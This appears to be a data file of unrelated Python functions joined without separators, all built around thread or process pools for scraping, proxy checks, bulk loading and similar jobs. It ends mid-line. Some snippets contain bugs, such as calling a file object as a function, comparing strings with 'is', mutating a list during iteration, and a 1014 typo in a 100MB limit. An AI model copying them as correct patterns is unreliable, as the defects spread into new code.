def simple_parallel(): values = [[2, 3, 5], [5, 5, 5], [2], [3, 3]] pool = Pool(4) results = pool.map(sum, values) pool.close() # closing the pool pool.join() # waiting for the work to finish print results
def createDemo(self): usersData = [] event = Event() pool = ThreadPool(multiprocessing.cpu_count() * 2) pool = ThreadPool(5) for i in range(0, 1000): string = hashlib.sha224() string.update('{}'.format(random.random())) first = 'first{}'.format(string.hexdigest()[0:10]) string.update('{}'.format(random.random())) last = 'last{}'.format(string.hexdigest()[0:10]) tel = '{}'.format(8005550000 + i) email = 'email{}@localhost.email'.format(string.hexdigest()[0:10]) postData = { 'first': first, 'last': last, 'tel': tel, 'email': email, 'pass': '******', 'type': 'customer', 'event': event } usersData.append(postData) results = pool.map(self.createUser, usersData) pool.close() pool.join()
def parallel_bulk(client, actions, thread_count=4, chunk_size=500, max_chunk_bytes=100 * 1014 * 1024, expand_action_callback=expand_action, **kwargs): """ Parallel version of the bulk helper run in multiple threads at once. :arg client: instance of :class:`~elasticsearch.Elasticsearch` to use :arg actions: iterator containing the actions :arg thread_count: size of the threadpool to use for the bulk requests :arg chunk_size: number of docs in one chunk sent to es (default: 500) :arg max_chunk_bytes: the maximum size of the request in bytes (default: 100MB) :arg raise_on_error: raise ``BulkIndexError`` containing errors (as `.errors`) from the execution of the last chunk when some occur. By default we raise. :arg raise_on_exception: if ``False`` then don't propagate exceptions from call to ``bulk`` and just report the items that failed as failed. :arg expand_action_callback: callback executed on each action passed in, should return a tuple containing the action line and the data line (`None` if data line should be omitted). """ # Avoid importing multiprocessing unless parallel_bulk is used # to avoid exceptions on restricted environments like App Engine from multiprocessing.dummy import Pool actions = map(expand_action_callback, actions) pool = Pool(thread_count) for result in pool.imap( lambda chunk: list(_process_bulk_chunk(client, chunk, **kwargs)), _chunk_actions(actions, chunk_size, max_chunk_bytes, client.transport.serializer) ): for item in result: yield item pool.close() pool.join()
def check_and_rank_ip(session): def ping_jd(ip): t = time.time() try: respond = requests.post('http://so.m.jd.com/ware/searchList.action', data={'_format_': 'json', 'stock': 1, 'page': 1, 'keyword': '手机'}, proxies=ip.to_proxy(), timeout=5).content json.loads(respond) ip.rank = int(100 * (time.time() - t)) except Exception: ip.rank = None return ip print datetime.now(), '开始判断ip活性' from multiprocessing.dummy import Pool as ThreadPool all_ip = session.query(IP).all() pool = ThreadPool(100) ips = pool.map(ping_jd, all_ip) for ip in ips: session.add(ip) session.query(IP).filter(IP.rank == None).delete() session.commit() pool.close() pool.join() return session.query(IP).count()
def run(): t = [ ('users', User().create), ('forums', Forum().create), ('threads', Thread().create), ('posts', Post().create), ("followers", User().follow), ("subscribptions", Thread().subscribe), ] for entity, factory in t: entities = [True for i in range(int(settings[entity]))] num_tasks = len(entities) pool = ThreadPool(int(settings['num_threads'])) try: progress = range(5, 105, 5) for i, _ in enumerate(pool.imap(factory, entities)): perc = i * 100 / num_tasks if perc % 5 == 0 and perc in progress: log.print_out('Creating %s: %d%% done' % (entity, perc)) progress.remove(perc) pool.close() pool.join() except Exception, e: print e pool.terminate() sys.exit(1)
def get_offline_user_data(): if DEBUG_MODE: print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'get_offline_user_data') if r_session.exists('api_error_info'): return if datetime.now().minute < 50: return offline_users = [] for b_user in r_session.mget(*['user:%s' % name.decode('utf-8') for name in r_session.sdiff('users', *r_session.smembers('global:online.users'))]): user_info = json.loads(b_user.decode('utf-8')) username = user_info.get('username') if not user_info.get('active'): continue every_hour_key = 'user:%s:cron_queued' % username if r_session.exists(every_hour_key): continue offline_users.append(username) pool = ThreadPool(processes=5) pool.map(get_data, offline_users) pool.close() pool.join()
def main(): dfbToken = raw_input('Enter your Dropbox Business API App token (Team Member File Access permission): ') if args.verbose: dumpArguments() global fileQuota fileQuota = args.quota * UNITS[args.units] log("Creating Dropbox V2 API Client") global dbxApiV2 dbxApiV2 = DbxApi(DbxApi.DBX_API_V2, dfbToken) log("Collecting Member List...") members = getDfbMembers(None) # Filter out invited members as they can't consume any quota yet activeMembers = [member for member in members if member.status != "invited"] log("Got {} total team members ({} active, {} suspended, {} invited)" .format( len(members), len(activeMembers), len(getMemberSublist(members, "suspended")), len(getMemberSublist(members, "invited")) )) log("Collecting file quota information - this may take a while...") pool = ThreadPool(args.threads) members = pool.map(getFileQuotaUsage, activeMembers) pool.close() pool.join() # Write final output log("Processing complete, writing output to {}".format(args.output.name)) dumpCsvFile(members)
def load_rowdata_to_mongo_zh(is_incremental): print("start loading row data(zh) from JSON file to MongoDB...") all_start = timeit.default_timer() static = Static() bydim_dir = static.output_folder + static.dataset_bydim_folder client = MongoClient(static.mongo_url, static.mongo_port) db = client[static.database_name] dataset_col = db[static.dataset_col_name] if not is_incremental: dataset_col.drop() file_path_array = [] for idx, file in enumerate(os.listdir(bydim_dir)): file_path = os.path.join(bydim_dir, file) if os.path.isfile(file_path): file_path_array.append(file_path) print(str(len(file_path_array)) + " files are loaded") counter = [] mapfunc = partial(insert_by_dim, counter=counter, dataset_col=dataset_col, all_start=all_start) pool = ThreadPool(12) pool.map(mapfunc, file_path_array) pool.close() pool.join() print("All the threads are completed. Total number is " + str(len(counter)) + "\n") print("total time cost: " + str(round(timeit.default_timer() - all_start)) + 's')
def run(threads): urls = ['http://www.python.org', 'http://www.python.org/about/', 'http://www.onlamp.com/pub/a/python/2003/04/17/metaclasses.html', 'http://www.python.org/doc/', 'http://www.python.org/download/', 'http://www.python.org/getit/', 'http://www.python.org/community/', 'https://wiki.python.org/moin/', 'http://planet.python.org/', 'https://wiki.python.org/moin/LocalUserGroups', 'http://www.python.org/psf/', 'http://docs.python.org/devguide/', 'http://www.python.org/community/awards/' ] results = [] scontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1) requests = [urllib.request.Request(url=url,data=b'None', headers={'User-Agent':' Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0'}) for url in urls] pool = ThreadPool(threads) results = list(pool.map(lambda x: urllib.request.urlopen(x, context=scontext), requests)) pool.close() pool.join() dataLen = [len(result.read().decode('utf-8')) for result in results] print(threads, 'поток(ов), прочитано', sum(dataLen), 'байт')
def parse_films_infomation(item): title = item[0] title_deal = ''.join(title.split('*')) title_deal=''.join(title_deal.split('/')) title_deal=''.join(title_deal.split(':')) os.mkdir(title_deal) os.chdir(title_deal) film_info = item[1] with open('film_tag.txt', 'w+', encoding='utf-8') as file: for i in film_info: file.write(i) magnent_container = item[3] with open('magnent.txt', 'w+', encoding='utf-8') as file2: for per_list in magnent_container: strings = ''.join(i + ' ' for i in per_list) file2.write(strings + '\n') # os.mkdir('sample_img') # os.chdir('sample_img') film_pic_url = item[2] sample_images_urls = item[4] # print(type(sample_images_urls)) # 设置线程池 child_pool = ThreadPool(12) result = child_pool.map(download, sample_images_urls) # print('下载完成') child_pool.close() child_pool.join() os.chdir('../')
def build_words_weight(): st = time.time() bigvs = BigVs.objects.all() def _build(b): data = ArticlePostedResults.active_objects.filter(bigv__v_id=b.v_id, is_correct__in=(0, 1)).values('is_correct').annotate(count=Count('is_correct')).order_by('is_correct') sum_c , w, c = 0, 0, 0 for d in data: if d['is_correct'] == 1: c = d['count'] sum_c += d['count'] if sum_c: w = c * 1.0 / sum_c c = w * 200 sum_c = 200 data = Judgement.objects.filter(article__bigv=b, judge__isnull=False).values('judge').annotate(count=Count('judge')).order_by('judge') for d in data: if d['judge'] == 'right': c += d['count'] sum_c += d['count'] if sum_c: w = int(round(c * 1.0 / sum_c * 100)) b.words_weight = w b.save() print b.name, c, sum_c, w pool = Pool(8) pool.map(_build, bigvs) pool.close() pool.join() ed = time.time() debug('build_words_weight', ed - st)
def test_multi_threading(): import time import random from multiprocessing.dummy import Pool def op_a(a, b): time.sleep(random.random()*.02) return a+b def op_b(c, b): time.sleep(random.random()*.02) return c+b def op_c(a, b): time.sleep(random.random()*.02) return a*b pipeline = compose(name="pipeline", merge=True)( operation(name="op_a", needs=['a', 'b'], provides='c')(op_a), operation(name="op_b", needs=['c', 'b'], provides='d')(op_b), operation(name="op_c", needs=['a', 'b'], provides='e')(op_c), ) def infer(i): # data = open("616039-bradpitt.jpg").read() outputs = ["c", "d", "e"] results = pipeline({"a": 1, "b":2}, outputs) assert tuple(sorted(results.keys())) == tuple(sorted(outputs)), (outputs, results) return results N = 100 for i in range(20, 200): pool = Pool(i) pool.map(infer, range(N)) pool.close()
def load(cls, docs, ignore_errors=False): """Force load the provided docs to read from file system.""" if not docs: return pod = docs[0].pod def load_func(doc): """Force the doc to read the source file.""" try: # pylint: disable=pointless-statement doc.has_serving_path() # Using doc fields forces file read. except document_front_matter.BadFormatError: if not ignore_errors: raise with pod.profile.timer('DocsLoader.load'): if ThreadPool is None or len(docs) < cls.MIN_POOL_COUNT: for doc in docs: load_func(doc) return pool_size = min(cls.MAX_POOL_SIZE, len(docs) * cls.POOL_RATIO) pool_size = int(round(pool_size)) thread_pool = ThreadPool(pool_size) results = thread_pool.imap_unordered(load_func, docs) # Loop results to make sure that the threads are all processed. for _ in results: pass thread_pool.close() thread_pool.join()
def Producer(): # urls = [ # 'http://www.python.org', # 'http://www.python.org/about/', # 'http://www.onlamp.com/pub/a/python/2003/04/17/metaclasses.html', # 'http://www.python.org/doc/', # 'http://www.python.org/download/', # 'http://www.python.org/getit/', # 'http://www.python.org/community/', # 'https://wiki.python.org/moin/', # 'http://planet.python.org/', # 'https://wiki.python.org/moin/LocalUserGroups', # 'http://www.python.org/psf/', # 'http://docs.python.org/devguide/', # 'http://www.python.org/community/awards/' # # etc.. # ] # 'http://wwww.qq.com','http://www.baidu.com' urls = [ 'http://www.taobao.com','http://www.sina.com.cn' ] start_time = time.time() # Make the Pool of workers pool = ThreadPool(4) # Open the urls in their own threads # and return the results results = pool.map(urllib2.urlopen, urls) #close the pool and wait for the work to finish pool.close() pool.join() print "Done! time Taken()",format(time.time()-start_time)
def collect_crystal(): print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'collect_crystal') pool = ThreadPool(processes=5) pool.map(check_collect, (json.loads(c.decode('utf-8')) for c in r_session.smembers('global:auto.collect.cookies'))) pool.close() pool.join()
def create_all_preflop_two_hand_equity(verbose=False, save=False, distributed=False, nb_process=4): """returns preflop_two_hand_equity for all two hand preflop combinations""" global all_preflop_two_hands print '\n--------------- start create_all_preflop_two_hand_equity' print 'all preflop two hands = \nstart = {}\nend = {}\nnb of elements = {}'.format(all_preflop_two_hands[:5], all_preflop_two_hands[-5:], len(all_preflop_two_hands)) t0 = timer() if (distributed): pool = ThreadPool(nb_process) equity = pool.map(preflop_two_hand_equity, all_preflop_two_hands[:]) pool.close() pool.join() else: equity = [] for k, p in enumerate(all_preflop_two_hands[:]): if (verbose): # print k,' - ', p sys.stdout.write('\rk=%5d / %5d : {}' % (k+1, len(all_preflop_two_hands)), p) sys.stdout.flush() equity.append(preflop_two_hand_equity(p)) t1 = timer() print 'all_preflop_two_hand_equity time = {:9.4f} s'.format(t1-t0) print 'exact number of distinct (rankwise) pairs of preflop hands = {}'.format(np.array([len(e) for e in equity]).sum()) if (save): cPickle.dump(equity, open(os.path.join('Tables', 'all_preflop_two_hand_equity.pk'), 'wb')) print '{} saved to disk as {}'.format('equity', os.path.join('Tables', 'all_preflop_two_hand_equity.pk')) return equity
def make_unaligned_fasta(dnaDirectory, groupsDict): """ Reads through files in provided directory to find gene sequences that match the proteins in the groups dictionary""" print "Collecting core genes" def make_fasta(group): proteins = groupsDict[group] out = open('proteinAlignments/' + group + '.fasta', 'w') records = [] seqIDs = [] for protein in proteins: seqID = protein.split('|')[0] seqIDs.append(seqID) protein = protein.split('|')[1] records.append(seqRecordDict[protein]) SeqIO.write(records, out, 'fasta') return seqIDs try: os.makedirs("proteinAlignments") except OSError: if not os.path.isdir("proteinAlignments"): raise files = listdir_fullpath(dnaDirectory) seqRecordDict = {} seqIDs = [] for f in files: handle = open(f, 'r') for record in SeqIO.parse(handle, 'fasta'): seqRecordDict[record.id] = record pool = ThreadPool(args.threads) seqIDs = pool.map(make_fasta, groupsDict.keys()) pool.close() pool.join() return seqIDs[0]
def simTrans(hosts, prm): fname = str(prm.n) + 'nodes.' + str(prm.data_size) + 'MB.' + str(prm.pipes) + 'pipes.out' for h in hosts: full_name = "results/%04d/%s"%(int(h.name.split('h')[1]), fname) os.system("rm %s" % full_name) status[h.name] = [0 for i in range(prm.pipes)] ip[h.name] = h.IP() h.cmdPrint('iperf -s -f M >> %s &'%full_name) '''for h1 in hosts: for h2 in hosts: if h1 == h2: continue print "Testing %s and %s after running server" % (h1.name, h2.name) net.iperf( (h1, h2) ) ''' print neib status['h1'] = [2 for i in range(prm.pipes)] #start node print status k = [] for h in hosts: k.append((h, prm)) pool = ThreadPool(50) pool.map(perNodeProc, k) pool.close() pool.join() for h in hosts: h.cmdPrint('kill %iperf')
def grab_everything(): node_links = grab_blog_node_links() pool = ThreadPool(cpu_count()) results = pool.map(grab_blog_content, node_links) pool.close() pool.join() return results
def _download_all(items): """Async download of the files. Example: [(url, quality, file_path)] """ global WORKERS # Don't start more workers then 1:1 if WORKERS < len(items): WORKERS = len(items) pool = ThreadPool(WORKERS) chunks = 1 # TODO # 1 ffmpeg is normally 10x- 20x * 2500kbits ish # so depending on how many items you download and # your bandwidth you might need to tweak chunk results = pool.imap_unordered(dl, items, chunks) try: for j in tqdm.tqdm(results, total=len(items)): pass finally: pool.close() pool.join()
def dns_resolver(filename, dst="mail.txt"): try: fd = open(filename, 'r') except: print 'can not open the file:', filename return try: fd_write = open(dst,'w') except: print 'error in open',dst return thread_num = 2 pool = ThreadPool(thread_num) results = pool.map(verify_domain,fd.readlines()) pool.close() pool.join() results = list(set(results)) results = [item for item in results if item] for line in results: fd_write(line) fd_write.close()
def main(): parser = argparse.ArgumentParser(description='Checks a LegalOne application for broken links') parser.add_argument('-d', '--domain', help='URL to check for broken links. Ex. http://colucci.release.dco.novajus.com.br', required=True) parser.add_argument("-e", '--escritorio', help='Account to check for broken links, Ex. xxxx, where xxx.release.dco.novajus.com.br', required=True) parser.add_argument("-l", '--loginpage', help='URL to login on the application. Ex. http://release.dco.novajus.com.br/conta/login', required=True) parser.add_argument("-t", '--threads', type=int, help='How many threads sarching for broken links at the same time. Default is 10', required=False, default=10) args = parser.parse_args() loginpage = args.loginpage escritorio = args.escritorio domain = args.domain threads = args.threads pages_to_test = queue.Queue(maxsize=0) cookie_login = login(domain, escritorio, loginpage) pages_to_test.put(domain + "/contatos/contatos/search") test_url(cookie_login, pages_to_test, domain, pages_to_test.get()) while not pages_to_test.empty(): pool = ThreadPool(threads) links_to_check = [] for x in range(0, threads): links_to_check.append(pages_to_test.get()) partialtest_url = partial(test_url, cookie_login, pages_to_test, domain) pool.map(partialtest_url, links_to_check) pool.close() pool.join()
def main(): parser = argparse.ArgumentParser(usage='%(prog)s [options] SERVER_URL', description=__doc__) parser.add_argument( '-t', '--threads', help='Number of threads (simultaneous connections)', dest='threads', default=1, type=int) parser.add_argument('server', help='URL of server') args = parser.parse_args() server = args.server if not server.startswith('http://'): server = 'http://{}'.format(server) icons = [] for font_id, font in fonts.items(): for char in font['characters']: url = os.path.join(server, 'icon', font_id, '000', char) icons.append((font_id, char, url)) icons.sort() print('{} icons to test on {} ...'.format(len(icons), args.server)) if MAX_ICONS: icons = icons[:MAX_ICONS] pool = Pool(args.threads) pool.map(check_icon, icons) pool.close() pool.join()
def e_cal(l, cores): global LOOPS ''' e calculator this function will recive digits of float and calculate and print status during working. This function will return value of e. ''' p = Pool() getcontext().prec = l e = Decimal(0) i = 0 temp = 0 c = 0 while True: fact = p.map(math.factorial, range(i, i+cores)) #parallel process factorial e += sum(p.map(one_div, fact)) #processed factorial will total in here i += cores c += 1 LOOPS += 1 sys.stdout.write("\r%i loops passed." % (c) ) #Print Loop status sys.stdout.flush() #print i, "loops passed." if e == temp: break temp = e sys.stdout.write("\r%i loops passed.\n" % (c) ) print i p.close() p.join() return e
def multiRunuser(): pool = ThreadPool(cpu_count() * 8) global ip_list global results results = pool.map_async(runuser, ip_list) pool.close() pool.join()
def getAllSecrets(version="", region=None, table="credential-store", context=None, credential=None, session=None, **kwargs): ''' fetch and decrypt all secrets ''' if session is None: session = get_session(**kwargs) dynamodb = session.resource('dynamodb', region_name=region) kms = session.client('kms', region_name=region) secrets = listSecrets(region, table, **kwargs) # Only return the secrets that match the pattern in `credential` # This already works out of the box with the CLI get action, # but that action doesn't support wildcards when using as library if credential and WILDCARD_CHAR in credential: names = set(expand_wildcard(credential, [x["name"] for x in secrets])) else: names = set(x["name"] for x in secrets) pool = ThreadPool(min(len(names), THREAD_POOL_MAX_SIZE)) results = pool.map( lambda credential: getSecret(credential, version, region, table, context, dynamodb, kms, **kwargs), names) pool.close() pool.join() return dict(zip(names, results))
def eval_dir(fn, files_list): pool = ThreadPool(WORKER_NUM) results = pool.map(fn, files_list) # close the pool and wait for the work to finish pool.close() pool.join() return sum(results)
def get_proxy(self): self._parse_proxy() pool = ThreadPool(8) pool.map(self._check_proxy, self.proxies) pool.close() pool.join() return self.checked_proxies
def get_proxys(file_name, thread_num=5): """这里的文件内容可以是从cn-proxy.com复制过来的数据""" proxys = [] ip_reg = re.compile(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', re.I) try: with open(file_name, 'r') as fd_proxy: for line in fd_proxy: if line and line.strip(): print 'line',line.strip() if ip_reg.match(line.strip()): ip, port = line.strip().split()[0], line.strip().split()[1] proxy = '%s:%s' %(ip, port) print 'proxy',proxy # if test_connection(proxy): if proxy: proxys.append(proxy) pool = ThreadPool(thread_num) results = pool.map(test_connection,proxys) pool.close() pool.join() proxys = list(set(results)) proxys = sorted(proxys,key=lambda x:x.split(".")[0]) except Exception,e: print 'error',e
def parallel_runner(args): pool = ThreadPool(args.parallel) map_args = map(lambda f: (args, f), args.file) result = pool.map(run_cmd, map_args) pool.close() pool.join() print result
def make_unaln_files (search_dir, best_extension, cutoff, dbpath, outdir, outext, force=False, index_type="sfetch", threads=2,multi=False): orthologs = {} dbidx = "" index_type = index_type.lower() if index_type == "cdbfasta": dbidx = dbpath + CDBYANKEXT elif index_type == "sfetch": dbidx = dbpath + SFETCHEXT if not os.path.exists(outdir): os.makedirs(outdir) if not os.path.exists(dbidx): print("No dbidx %s exists for reading" % (dbidx)) return -1 for file in os.listdir(search_dir): if file.endswith("."+best_extension): with open(os.path.join(search_dir,file),"r") as fh: for line in fh: row = line.strip().split("\t") HMMname = row.pop(0) # take first col as HMM name if best_extension == "best": if float(row[1]) <= float(cutoff): if HMMname in orthologs: orthologs[HMMname].append(row[0]) else: orthologs[HMMname] = [ row[0] ] elif best_extension == "best_multi": if not multi: row = [ row[0] ] for hit in row: hit_dat = hit.split(",") if HMMname in orthologs: orthologs[HMMname].append(hit_dat[0]) else: orthologs[HMMname] = [ hit_dat[0] ] pool = ThreadPool(threads) fileset = [] for orth in orthologs: outfile = "%s.%s" % (os.path.join(outdir,orth),outext) if force or (not os.path.exists(outfile)): if len(orthologs[orth]) >= Min_taxa: fileset.append( [dbpath, outfile,"\n".join(orthologs[orth]) + "\n"]) if index_type == "cdbfasta": results = pool.map(run_cdbyank, fileset) elif index_type == "sfetch": results = pool.map(run_sfetch, fileset) # close the pool and wait for the work to finish pool.close() pool.join()
run_result = automata_run_stat(atm=atm, file_path=input_path[uat], cycle_detail=True, report_detail=False, bytes_per_dim=1) real_final.append(run_result[total_reports]) appr_run_result = automata_run_stat(atm=appr_automata, file_path=input_path[uat], cycle_detail=True, report_detail=False, bytes_per_dim=1, translation_dic=translation_dic) approximate_final.append(appr_run_result[total_reports]) with open(str(uat) + '.ttxt', "a") as f: print >> f, "real reports: " + str(real_final[-1]) print >> f, "approximate reports: " + str(approximate_final[-1]) print >> f, "real nodes count: " + str(atm.nodes_count) print >> f, "approximate nodes count:" + str(appr_automata.nodes_count) print >>f, "----------------------------------------------------------------" with open(str(uat) + '.ttxt', "a") as f: print >>f, "***************sum*******************" print >>f, "real reports: " + str(sum(real_final)) print >>f, "approximate reports: " + str(sum(approximate_final)) print >>f, "real nodes count: " + str(real_states) print >>f, "approximate nodes count:" + str(appr_states) if __name__ == '__main__': ds = [a for a in AnmalZoo] thread_count = 8 t_pool = ThreadPool(thread_count) results = t_pool.map(process_single_ds, ds) t_pool.close() t_pool.join()
# Get a Virtual Network context by Name print('\n====> Get a Virtual Network Context by Name: {}'.format(vnname)) print(json.dumps(dnac.get_virtual_network_by_name(vnname), indent=2)) # Get a Virtual Network context by Id vnid = dnac.get_virtual_network_id(vnname) print('\n====> Get a Virtual Network Context by Id: {}'.format(vnid, vnname)) print(json.dumps(dnac.get_virtual_network_by_id(vnid), indent=2)) # Delete a Virtual Network context print('\n==== Deleting Virtual Network: {} ===='.format(vnname)) response = dnac.delete_virtual_network_by_name(vnname, asynch=False) print(json.dumps(response, indent=2)) # Get a Virtual Network context ID given its name vnname = 'INFRA_VN' print('\n====> Get a Virtual Network Context ID given its name:') print('Virtual Network context Name: {}'.format(vnname)) print('Virtual Network context ID: {}'.format(dnac.get_virtual_network_id(vnname))) # Multi-threading pool = Pool(4) thread_timeout = 8640 operations = [] operations.append((dnac.exists_virtual_network, {'vn_name': vnname})) data = pool.map_async(utils.run_workers, operations).get(thread_timeout) pool.close() pool.join() print(data)
def diff(self, from_file, to_file, out_file, log_file): """ Split binaries in chunks, diff each chunk and generate a file with all chunks (binary patch, compressed or empty) """ out_dir = os.path.dirname(out_file) try: os.stat(out_dir) except: os.mkdir(out_dir) with open(to_file, 'rb') as t, open(from_file, 'rb') as f: from_mmap = mmap.mmap(f.fileno(), 0, prot=mmap.PROT_READ) to_mmap = mmap.mmap(t.fileno(), 0, prot=mmap.PROT_READ) from_len = from_mmap.size() assert from_len != 0 to_len = to_mmap.size() assert to_len != 0 from_hash = sha256(from_mmap).digest() to_hash = sha256(to_mmap).digest() assert from_hash != to_hash from_list = list(self._chunk(from_mmap)) to_list = list(self._chunk(to_mmap)) if self.verbose: print "Using %d threads" % (self.threads) pool = ThreadPool(multiprocessing.cpu_count()) oss = list() tss = list() xxx = list() for x in range(0, len(to_list)): try: o = from_list[x] except IndexError: o = list() try: t = to_list[x] except IndexError: t = list() oss.append(o) tss.append(t) xxx.append(x) results = pool.map(self._diff_with_exception, zip(oss, tss, xxx)) pool.close() pool.join() out_fd = open(out_file, "wb") total_bytes = 0 patch_information = {} patch_information["chunks"] = {} for result in results: patch_information["chunks"]["%d" % result.get("_id")] = result if result["_type"] > CHUNK_TYPE_KEEP: in_fd = open( "%s/%s" % (self.temp_directory, result['_name']), "rb") in_buffer = mmap.mmap(in_fd.fileno(), 0, prot=mmap.PROT_READ) total_bytes += result['size_output'] out_fd.write(in_buffer) in_buffer.close() in_fd.close() to_file_data = open(to_file, "rb").read() to_file_len = len(to_file_data) to_file_compressed_len = len(LZG().compress(to_file_data)) to_file_crc = binascii.crc32(to_file_data) patch_information.update({ "chunk_size": self.chunk_size, "_name": os.path.basename(out_file), "size": total_bytes, "size_patch": total_bytes, "size_compressed": to_file_compressed_len, "size_original": to_file_len, "crc": "0x%x" % (to_file_crc & 0xffffffff), "gain_vs_original": to_file_len - total_bytes, "gain_vs_compressed": to_file_compressed_len - total_bytes, "ratio_vs_original": "%0.5f" % (1.0 * total_bytes / to_file_len), "ratio_vs_compressed": "%0.5f" % (1.0 * total_bytes / to_file_compressed_len), }) if to_file_compressed_len <= total_bytes: patch_information["_name"] = os.path.basename(to_file) patch_information["size"] = to_file_compressed_len patch_information[ "gain_vs_original"] = to_file_len - to_file_compressed_len patch_information["gain_vs_compressed"] = 0 patch_information["ratio_vs_original"] = "%0.5f" % \ (1.0 * to_file_compressed_len / to_file_len) patch_information["ratio_vs_compressed"] = 1 use_patch = False else: use_patch = True with open(log_file, 'w') as f: f.write(json.dumps(patch_information, indent=4, sort_keys=True)) if self.verbose: print json.dumps(patch_information, indent=4, sort_keys=True) return use_patch, patch_information
class BaseSpider: """ Basic simple spider Right in class you can specify such arguments: urls - list of str urls. data_handlers - list of data handlers. The data from parsing function goes right there. workers - number of workers in the Pool. You can overload such functions: parse(self, request, html) - parse data here. This method accepts scrapping.requests.Request and bs4.BeautifulSoup arguments. get_requests(self) - if you don't have prepared urls to parse find them here and return as scrapping.requests.Request object. Other data types would be ignored. """ workers = 5 urls = [] data_handlers = [] name = None def __init__(self, urls=None, name=None, workers=None, data_handlers=None): self.urls = urls if urls else self.urls self.workers = workers if workers else self.workers self.data_handlers = data_handlers if data_handlers else self.data_handlers self._stored_requests = [] self.name = name if name else self.name if not self.name: self.name = self.__class__.__name__ # self.logger = logging.getLogger('spider.BaseSpider') self.logger = logging.getLogger(self.name) # if def get_requests(self): """ Use this method to navigate through requests/links return/yield: scrapping.requests.Request object Note: if parsing function is not specified the default one will be used """ return list(map(lambda url: Request(url), self.urls)) def parse(self, request, html): """ Default parsing function return/yield: dict with parsed data scrapping.requests.Request object """ self.logger.warning("{} for {} parse method empty! Returning None.".format(self.name, request._url)) def start(self): "Starts crawling" self.logger.info("{} started!".format(self.name)) # for storing the data open data handlers self.open_data_handlers() for request in self.get_requests(): # check if they are real Request obj and have parser if isinstance(request, Request): if not request.parser: request.parser = self.parse self._stored_requests.append(request) self.pool = ThreadPool(self.workers) # all requests are parsed paralelly ret_items = self.pool.map(self._handle_request, self._stored_requests) # print(ret_items) # self.logger.debug('here 1 {}'.format(ret_items)) # wait untill all first done self.pool.close() self.pool.join() # unpack returned packed objects from pool ret_items = self._unpack_packed(ret_items) self._save_ret_items_data(ret_items) # self.logger.debug('here 2 {}'.format(ret_items)) # if any other return Request obj handle that while any(ret_items): # clean the list, only Requests left ret_requests = list(filter(lambda item: isinstance(item, Request), ret_items)) for request in ret_requests: if not request.parser: request.parser = self.parse self.pool = ThreadPool(self.workers) # all requests are parsed paralelly ret_items = list(self.pool.map(self._handle_request, ret_requests)) # unpack returned packed objects from pool ret_items = self._unpack_packed(ret_items) self._save_ret_items_data(ret_items) # wait untill all first done self.pool.close() self.pool.join() self.close_data_handlers() def _unpack_packed(self, i): "Unpacks all packed urls (lists) in given iterable object" for obj in i: if isinstance(obj, list): i.extend(obj) i.remove(obj) return i def _handle_request(self, request): # prepare data to parse and call the parser request.join() bs_obj = BeautifulSoup(request.text, 'lxml') ret = request.parser(request, bs_obj) # handle data returned by yield if isinstance(ret, types.GeneratorType): items = list(filter(lambda item: isinstance(item, dict) or isinstance(item, Request), ret)) return items else: return ret if isinstance(ret, dict) or isinstance(ret, Request) else None def _save_ret_items_data(self, items): "Handle every parsed data in returned sequence" for item in items: if isinstance(item, dict): self.handle_data(item) def handle_data(self, data): "Gives data to data_handlers" self.logger.debug("DATA: {}".format(data)) for handler in self.data_handlers: handler.process(data) def open_data_handlers(self): for handler in self.data_handlers: handler.setUp(self) self.logger.debug("Data handler {} set up.".format(handler.__class__.__name__)) def close_data_handlers(self): for handler in self.data_handlers: handler.tearDown() self.logger.debug("{} closed.".format(handler.__class__.__name__))
def fetch_group_time_series(self, time_series_request_list): data_frame_agg = None time_series_calcs = TimeSeriesCalcs() # depends on the nature of operation as to whether we should use threading or multiprocessing library if Constants().time_series_factory_thread_technique is "thread": from multiprocessing.dummy import Pool else: # most of the time is spend waiting for Bloomberg to return, so can use threads rather than multiprocessing # must use the multiprocessing_on_dill library otherwise can't pickle objects correctly # note: currently not very stable from multiprocessing_on_dill import Pool thread_no = Constants().time_series_factory_thread_no['other'] if time_series_request_list[0].data_source in Constants( ).time_series_factory_thread_no: thread_no = Constants().time_series_factory_thread_no[ time_series_request_list[0].data_source] pool = Pool(thread_no) # open the market data downloads in their own threads and return the results result = pool.map_async(self.fetch_single_time_series, time_series_request_list) data_frame_group = result.get() pool.close() pool.join() # data_frame_group = results.get() # data_frame_group = results # data_frame_group = None # import multiprocessing as multiprocessing # close the pool and wait for the work to finish # processes = [] # for x in range(0, len(time_series_request_list)): # time_series_request = time_series_request_list[x] # processes = [multiprocessing.Process(target = self.fetch_single_time_series, # args = (x)) for x in time_series_request_list] # pool.apply_async(tsf.harvest_category, args = (category_desc, environment, freq, # exclude_freq_cat, force_new_download_freq_cat, include_freq_cat)) # Run processes # for p in processes: p.start() # Exit the completed processes # for p in processes: p.join() # collect together all the time series if data_frame_group is not None: data_frame_group = [i for i in data_frame_group if i is not None] if data_frame_group is not None: data_frame_agg = time_series_calcs.pandas_outer_join( data_frame_group) # for data_frame_single in data_frame_group: # # if you call for returning multiple tickers, be careful with memory considerations! # if data_frame_single is not None: # if data_frame_agg is not None: # data_frame_agg = data_frame_agg.join(data_frame_single, how='outer') # else: # data_frame_agg = data_frame_single return data_frame_agg
def embed_message(embed_fn, path, payload, output_dir, embed_fn_saving=False): path=utils.absolute_path(path) if not os.path.exists(output_dir): os.makedirs(output_dir) output_dir=utils.absolute_path(output_dir) # Read filenames files=[] if os.path.isdir(path): for dirpath,_,filenames in os.walk(path): for f in filenames: path=os.path.abspath(os.path.join(dirpath, f)) if not utils.is_valid_image(path): print("Warning, please provide a valid image: ", f) else: files.append(path) else: files=[path] # remove fileas already generated in a previous execution filtered_files = [] for f in files: basename=os.path.basename(f) dst_path=os.path.join(output_dir, basename) if os.path.exists(dst_path): print("Warning! file already exists, ignored:", dst_path) continue filtered_files.append(f) files = filtered_files del filtered_files def embed(path): basename=os.path.basename(path) dst_path=os.path.join(output_dir, basename) if embed_fn_saving: embed_fn(path, payload, dst_path) else: X=embed_fn(path, payload) try: scipy.misc.toimage(X, cmin=0, cmax=255).save(dst_path) except Exception as e: print(str(e)) # Process thread pool in batches batch=1000 for i in range(0, len(files), batch): files_batch = files[i:i+batch] n_core=cpu_count() print("Using", n_core, "threads") pool = ThreadPool(n_core) results = 